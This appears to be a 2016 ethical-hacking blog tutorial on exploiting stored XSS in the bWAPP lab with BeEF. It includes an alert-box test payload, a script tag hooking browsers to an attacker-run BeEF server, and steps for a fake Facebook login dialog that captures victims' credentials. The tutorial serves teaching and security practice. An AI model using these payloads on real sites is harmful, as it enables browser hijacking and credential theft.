Daniele DonzelliDaniele DonzelliDaniele DonzelliDaniele Donzelli
  • HOME
  • iOS
  • ARDUINO
  • ETHICAL HACKING
  • ABOUT

XSS Stored with BeEF

    Home Ethical Hacking XSS Stored with BeEF

    XSS Stored with BeEF

    By Dany | Ethical Hacking | 0 comment | 24 May, 2016 | 0

    Stored XSS (or Persistent XSS) is the most dangerous type of XSS. The attacker injects a script (payload) that is permanently stored (persisted) on the vulnerable site.
    The malicious code is executed every time a browser visits an “infected” page, so with only one attack, the attacker can exploit many users. Usually the malicious script is inserted in a comment field on a blog or in a forum post.
    For this tutorial we’ll use bWAPP vulnerable application.
    Start the bee-box and verify the IP address (open the terminal and type “ifconfig”), in my case 192.168.1.10. Now open your browser and connect to bee-box address. Login in and choose Cross-Site Scripting – Stored (Blog)

    xssstored

    CHECK IF IT IS VULNERABLE

    To test if the input field is vulnerable, we try to inject this script:

    1
    <script>alert('XSS')</script>

    If it is vulnerable, it will show us an alert box that says: XSS. How you can see, it show us an alert box, this means that it is vulnerable.

    xssstored

    Now, if you try to login in and visit this page from another browser, you’ll see that the alert box will appear, this is because our payload is saved into the database.

    BeEF

    A common way to exploit a XSS is BeEF (Browser Exploitation Framework). With this tool we can do many different types of attacks. You can download BeEF from here. If you use kali linux or any other penetration testing distro you will find it already installed.
    When you open BeEF you will see the Hook URL, that will be our payload, and the UI URL, that is the user interface panel

    xssstored

    Open the user interface panel in your browser and login in, the default username and password are beef:beef.
    On the left side, we can see “Online Browsers” and “Offline Browsers”, which represent the hooked browsers, some of which are online and the others are offline.
    Ok let’s start with the attack. Get your IP address (open the terminal and type “ifconfig”) and insert it in the Hook URL in this way

    1
    <script src="http://192.168.1.19:3000/hook.js"></script>

    Now in bWAPP delete the script that you have inserted previously, and add the new BeEF script

    xssstored

    Try to visit the “infected” page with another browser or another computer and you should see the hooked browsers. In my case Linux and OSX

    xssstored

    Now we try an attack to see what BeEF can do.
    Go to the Commands tab, open Social Engineering folder and select Pretty Theft. In Dialog Type select Facebook and click on execute.

    xssstored

    This command will open on the victim’s browser a Facebook login dialog box. If the victim will enter his login data, we will receive them.

    xssstored

    If you click on the “command result”, you will see the victim credentials

    xssstored

    This is just one example of what you can do with BeEF, as you can see, there are many other commands that can be executed.

    VIDEO OF THIS TUTORIAL

    beef, ethicalhacking, xss, xssstored
    Dany

    Dany

    I'm tech enthusiast, i love learning and experimenting new things. My main interests are iOS Development, Arduino and Ethical Hacking, but i also like to experiment other languages like Python, Java, PHP and Android Development.

    More posts by Dany

    Related Post

    • XSS Reflected

      By Dany | 1 comment

      Reflected XSS is the most common type of XSS. It occurs when the malicious payload is part of the request that the victim’s browser sends to the vulnerable site. This type of attack is calledRead more

    • bWAPP – Web Application Pentest Lab

      By Dany | 2 comments

      bWAPP is a PHP application that uses a MySQL database. It has over 100 web vulnerabilities! It covers all major known web bugs, including all risks from the OWASP Top 10 project. bWAPP can beRead more

    Recent Posts

    • 7 August, 2016
      1

      Blind SQL Injection – Boolean based

    • 15 July, 2016
      0

      Controlling LED brightness with a potentiometer

    • 4 July, 2016
      0

      SQL Injection – Union Based

    • 21 June, 2016
      0

      UIStepper Tutorial

    Archives

    • August 2016
    • July 2016
    • June 2016
    • May 2016
    • April 2016

    Categories

    • Arduino
    • Ethical Hacking
    • iOS

    Recent Posts

    • 7 August, 2016
      1

      Blind SQL Injection – Boolean based

    • 15 July, 2016
      0

      Controlling LED brightness with a potentiometer

    • 4 July, 2016
      0

      SQL Injection – Union Based

    Categories

    • Arduino
    • Ethical Hacking
    • iOS
    © 2016 Donzelli Daniele | All Rights Reserved
    • HOME
    • iOS
    • ARDUINO
    • ETHICAL HACKING
    • ABOUT
    Daniele Donzelli